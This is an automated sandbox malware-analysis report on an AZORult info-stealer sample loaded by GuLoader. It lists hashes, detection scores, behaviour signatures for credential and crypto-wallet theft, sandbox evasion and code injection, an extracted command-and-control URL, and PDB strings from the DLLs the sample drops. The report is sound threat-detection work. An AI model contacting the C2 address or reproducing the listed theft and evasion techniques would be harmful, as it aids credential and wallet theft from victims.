Windows Analysis Report 1COK25f1vT.exe

Overview

General Information

Sample Name:	1COK25f1vT.exe
Analysis ID:	542372
MD5:	5918b91ac2931af0267e4af06f3fd2e2
SHA1:	1ce7cccf52a0a569d013c0a91efb4f808c3c6194
SHA256:	41acb7b14d4167374da9039e1324caac71b397bf246abb50cb9ae1ca197b3cc1
Tags:	AZORultexe
Infos:
Most interesting Screenshot:

Detection

AZORult GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Potential malicious icon found

Yara detected Azorult

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Detected AZORult Info Stealer

Yara detected Azorult Info Stealer

Detected unpacking (changes PE section rights)

GuLoader behavior detected

Yara detected GuLoader

Hides threads from debuggers

Tries to steal Mail credentials (via file / registry access)

Maps a DLL or memory area into another process

Tries to steal Crypto Currency Wallets

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to detect Any.run

Tries to harvest and steal ftp login credentials

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Self deletion via cmd delete

Tries to harvest and steal Bitcoin Wallet information

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

Tries to steal Instant Messenger accounts or passwords

Tries to harvest and steal browser information (history, passwords, etc)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

Antivirus or Machine Learning detection for unpacked file

Contains functionality to query locales information (e.g. system language)

Uses code obfuscation techniques (call, push, ret)

PE file contains sections with non-standard names

Internet Provider seen in connection with other malware

Detected potential crypto function

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Yara detected Credential Stealer

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

Found dropped PE file which has not been started or loaded

Contains functionality for execution timing, often used to detect debuggers

Abnormal high CPU Usage

Is looking for software installed on the system

Queries information about the installed CPU (vendor, model number etc)

PE file does not import any functions

Sample file is different than original file name gathered from version info

PE file contains an invalid checksum

Extensive use of GetProcAddress (often used to hide API calls)

PE file contains strange resources

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Binary contains a suspicious time stamp

Uses Microsoft's Enhanced Cryptographic Provider

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Signatures

AV Detection:

Found malware configuration

Source: 12.2.1COK25f1vT.exe.400000.0.unpack

Malware Configuration Extractor: Azorult {"C2 url": "http://185.29.11.112/rothchildnew/Panel/index.php"}

Multi AV Scanner detection for submitted file

Source: 1COK25f1vT.exe	Virustotal: Detection: 40%			Perma Link
Source: 1COK25f1vT.exe	ReversingLabs: Detection: 71%

Antivirus or Machine Learning detection for unpacked file

Source: 0.2.1COK25f1vT.exe.1fb10000.1.unpack

Avira: Label: TR/Dropper.Gen

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\Desktop\1COK25f1vT.exe

Code function: 12_2_0040A610 CryptUnprotectData,LocalFree,

12_2_0040A610

Compliance:

Uses 32bit PE files

Source: 1COK25f1vT.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: unknown	HTTPS traffic detected: 172.217.168.46:443 -> 192.168.2.3:49786 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.168.1:443 -> 192.168.2.3:49787 version: TLS 1.2

Source:	Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491634229.0000000020368000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.479960511.000000001F998000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491671682.0000000020370000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491651913.000000002036C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.479481362.000000001F994000.00000004.00000001.sdmp, api-ms-win-crt-locale-l1-1-0.dll.12.dr
Source:	Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491786540.00000000203A4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.482100861.000000001F990000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.482084797.000000001F99C000.00000004.00000001.sdmp, api-ms-win-crt-runtime-l1-1-0.dll.12.dr
Source:	Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb source: 1COK25f1vT.exe, 0000000C.00000003.484675523.000000001F998000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491908994.000000001F660000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491844346.000000001F610000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.484708142.000000001F9E4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.484234075.000000001F998000.00000004.00000001.sdmp, mozglue.dll.12.dr
Source:	Binary string: z:\build\build\src\obj-firefox\security\nss3.pdb source: 1COK25f1vT.exe, 0000000C.00000003.485757428.000000001F368000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.485890632.000000001F290000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492301830.000000001F6F0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491938965.000000001F6E0000.00000004.00000001.sdmp, nss3.dll.12.dr
Source:	Binary string: api-ms-win-core-file-l1-2-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491143128.00000000202F4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491075653.00000000202E8000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491029771.00000000202E4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491109654.00000000202EC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.490992060.00000000202E0000.00000004.00000001.sdmp, api-ms-win-core-file-l1-2-0.dll.12.dr
Source:	Binary string: ucrtbase.pdb source: 1COK25f1vT.exe, 0000000C.00000003.489027569.000000001F308000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492897666.000000001F85C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492773065.000000001F838000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492649482.000000001F820000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492301830.000000001F6F0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491938965.000000001F6E0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.489216061.000000001F1EC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.487925295.000000001F1CC000.00000004.00000001.sdmp, ucrtbase.dll.12.dr
Source:	Binary string: api-ms-win-core-memory-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491143128.00000000202F4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491172974.00000000202F8000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491203658.00000000202FC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491225253.0000000020300000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491277123.000000002030C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491294897.0000000020314000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491260411.0000000020308000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.471221878.000000001F998000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491075653.00000000202E8000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.470488936.000000001F994000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491029771.00000000202E4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491109654.00000000202EC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.490992060.00000000202E0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491243929.0000000020304000.00000004.00000001.sdmp, api-ms-win-core-memory-l1-1-0.dll.12.dr
Source:	Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: 1COK25f1vT.exe, 0000000C.00000003.484184430.000000001F9EC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491844346.000000001F610000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.483738780.000000001F990000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.484234075.000000001F998000.00000004.00000001.sdmp, freebl3.dll.12.dr
Source:	Binary string: api-ms-win-core-debug-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.463561095.000000001F994000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491029771.00000000202E4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.490992060.00000000202E0000.00000004.00000001.sdmp, api-ms-win-core-debug-l1-1-0.dll.12.dr
Source:	Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491501790.0000000020340000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491475649.000000002033C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.476648214.000000001F99C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491523003.0000000020344000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491363124.0000000020330000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491387107.0000000020334000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491439552.0000000020338000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.476666229.000000001F9A0000.00000004.00000001.sdmp, api-ms-win-core-sysinfo-l1-1-0.dll.12.dr
Source:	Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491634229.0000000020368000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.479096628.000000001F990000.00000004.00000001.sdmp, api-ms-win-crt-filesystem-l1-1-0.dll.12.dr
Source:	Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491786540.00000000203A4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.482506212.000000001F994000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.482100861.000000001F990000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491797103.00000000203A8000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, api-ms-win-crt-stdio-l1-1-0.dll.12.dr
Source:	Binary string: api-ms-win-core-heap-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491143128.00000000202F4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491172974.00000000202F8000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491203658.00000000202FC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491225253.0000000020300000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491075653.00000000202E8000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.468064054.000000001F994000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491029771.00000000202E4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491109654.00000000202EC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.490992060.00000000202E0000.00000004.00000001.sdmp, api-ms-win-core-heap-l1-1-0.dll.12.dr
Source:	Binary string: api-ms-win-core-util-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491560498.000000002034C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.477468468.000000001F990000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491501790.0000000020340000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491475649.000000002033C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491523003.0000000020344000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491545056.0000000020348000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491363124.0000000020330000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491387107.0000000020334000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491439552.0000000020338000.00000004.00000001.sdmp, api-ms-win-core-util-l1-1-0.dll.12.dr
Source:	Binary string: api-ms-win-core-synch-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491475649.000000002033C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.475402246.000000001F994000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491363124.0000000020330000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491387107.0000000020334000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491439552.0000000020338000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.475799639.000000001F998000.00000004.00000001.sdmp, api-ms-win-core-synch-l1-1-0.dll.12.dr
Source:	Binary string: vcruntime140.i386.pdbGCTL source: 1COK25f1vT.exe, 0000000C.00000003.490976694.000000001F304000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.489151743.000000001F290000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.493685455.000000001F978000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.490948392.000000001F1CC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp, vcruntime140.dll.12.dr
Source:	Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491560498.000000002034C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491604512.0000000020358000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491501790.0000000020340000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491586380.0000000020354000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491475649.000000002033C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491619490.000000002035C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491523003.0000000020344000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491545056.0000000020348000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491363124.0000000020330000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491387107.0000000020334000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491439552.0000000020338000.00000004.00000001.sdmp, api-ms-win-crt-environment-l1-1-0.dll.12.dr
Source:	Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb11 source: 1COK25f1vT.exe, 0000000C.00000003.484675523.000000001F998000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491908994.000000001F660000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491844346.000000001F610000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.484708142.000000001F9E4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.484234075.000000001F998000.00000004.00000001.sdmp, mozglue.dll.12.dr
Source:	Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491075653.00000000202E8000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491029771.00000000202E4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.490992060.00000000202E0000.00000004.00000001.sdmp, api-ms-win-core-errorhandling-l1-1-0.dll.12.dr
Source:	Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491143128.00000000202F4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491172974.00000000202F8000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491203658.00000000202FC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491225253.0000000020300000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491277123.000000002030C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491294897.0000000020314000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491260411.0000000020308000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491075653.00000000202E8000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491306740.0000000020318000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491029771.00000000202E4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491109654.00000000202EC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491334003.0000000020320000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491319974.000000002031C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.490992060.00000000202E0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491243929.0000000020304000.00000004.00000001.sdmp, api-ms-win-core-processthreads-l1-1-0.dll.12.dr
Source:	Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: 1COK25f1vT.exe, 0000000C.00000003.484184430.000000001F9EC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491844346.000000001F610000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.483738780.000000001F990000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.484234075.000000001F998000.00000004.00000001.sdmp, freebl3.dll.12.dr
Source:	Binary string: api-ms-win-core-console-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491836442.00000000203BC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491806581.00000000203B4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491826874.00000000203B8000.00000004.00000001.sdmp, api-ms-win-core-console-l1-1-0.dll.12.dr
Source:	Binary string: api-ms-win-crt-private-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.481305544.000000001F994000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491748363.0000000020388000.00000004.00000001.sdmp, api-ms-win-crt-private-l1-1-0.dll.12.dr
Source:	Binary string: api-ms-win-core-file-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491075653.00000000202E8000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491029771.00000000202E4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491109654.00000000202EC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.465766679.000000001F994000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.490992060.00000000202E0000.00000004.00000001.sdmp, api-ms-win-core-file-l1-1-0.dll.12.dr
Source:	Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491560498.000000002034C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491604512.0000000020358000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491501790.0000000020340000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491586380.0000000020354000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491475649.000000002033C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.477869582.000000001F994000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491523003.0000000020344000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.478268008.000000001F998000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491545056.0000000020348000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491363124.0000000020330000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.478663759.000000001F998000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491387107.0000000020334000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491439552.0000000020338000.00000004.00000001.sdmp, api-ms-win-crt-convert-l1-1-0.dll.12.dr
Source:	Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: 1COK25f1vT.exe, 0000000C.00000003.487823577.000000001F1F0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492773065.000000001F838000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492649482.000000001F820000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492301830.000000001F6F0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491938965.000000001F6E0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.487925295.000000001F1CC000.00000004.00000001.sdmp, softokn3.dll.12.dr
Source:	Binary string: msvcp140.i386.pdb source: 1COK25f1vT.exe, 0000000C.00000003.485203963.000000001F1CC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492268054.000000001F688000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.485153671.000000001F990000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp, msvcp140.dll.12.dr
Source:	Binary string: ucrtbase.pdbUGP source: 1COK25f1vT.exe, 0000000C.00000003.489027569.000000001F308000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492897666.000000001F85C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492773065.000000001F838000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492649482.000000001F820000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492301830.000000001F6F0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491938965.000000001F6E0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.489216061.000000001F1EC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.487925295.000000001F1CC000.00000004.00000001.sdmp, ucrtbase.dll.12.dr
Source:	Binary string: api-ms-win-core-profile-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491363124.0000000020330000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, api-ms-win-core-profile-l1-1-0.dll.12.dr
Source:	Binary string: api-ms-win-crt-time-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491806581.00000000203B4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491826874.00000000203B8000.00000004.00000001.sdmp, api-ms-win-crt-time-l1-1-0.dll.12.dr
Source:	Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: 1COK25f1vT.exe, 0000000C.00000003.487119055.000000001F238000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.487230327.000000001F364000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492649482.000000001F820000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.485890632.000000001F290000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492301830.000000001F6F0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491938965.000000001F6E0000.00000004.00000001.sdmp, nssdbm3.dll.12.dr
Source:	Binary string: api-ms-win-core-handle-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491143128.00000000202F4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491172974.00000000202F8000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491203658.00000000202FC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491075653.00000000202E8000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491029771.00000000202E4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491109654.00000000202EC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.490992060.00000000202E0000.00000004.00000001.sdmp, api-ms-win-core-handle-l1-1-0.dll.12.dr
Source:	Binary string: api-ms-win-core-synch-l1-2-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491501790.0000000020340000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491475649.000000002033C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491363124.0000000020330000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491387107.0000000020334000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491439552.0000000020338000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.475799639.000000001F998000.00000004.00000001.sdmp, api-ms-win-core-synch-l1-2-0.dll.12.dr
